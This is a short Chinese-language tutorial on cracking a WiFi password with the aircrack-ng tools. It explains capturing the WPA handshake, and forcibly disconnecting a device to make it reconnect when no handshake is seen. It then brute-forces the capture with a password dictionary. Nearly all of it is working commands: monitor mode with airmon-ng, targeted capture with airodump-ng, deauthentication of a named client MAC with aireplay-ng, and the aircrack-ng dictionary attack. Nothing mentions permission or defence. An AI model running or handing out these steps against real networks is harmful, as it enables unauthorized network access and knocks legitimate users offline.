破解原理
抓取握手包,用字典爆破,抓不到握手包,手动踢设备下线,等他重新登录
1 airmon-ng
2 开启检测
airmon-ng start wlan0
3 查看网卡
ifconfig
4扫描
airodump-ng wlan0
5 获取握手包
airodump-ng --bssid 36:12:8C:C3:34:29 -c 1 -w ap wlan0
持续扫描
6 踢终端下线
-a 路由器的mac
-c 设备的mac
aireplay-ng -0 10 -a 36:12:8C:C3:34:29 -c 3C:22:FB:90:42:A8 wlan0
踢掉有一个重连过程,可能会默认连接到别的无线上面,这样也无法获取到握手包。
7 断开监测
airmon-ng stop wlan0
8 破解
pass.txt是个密码本,cap是抓到的握手包
aircrack-ng -w /root/pass.txt ap-02.cap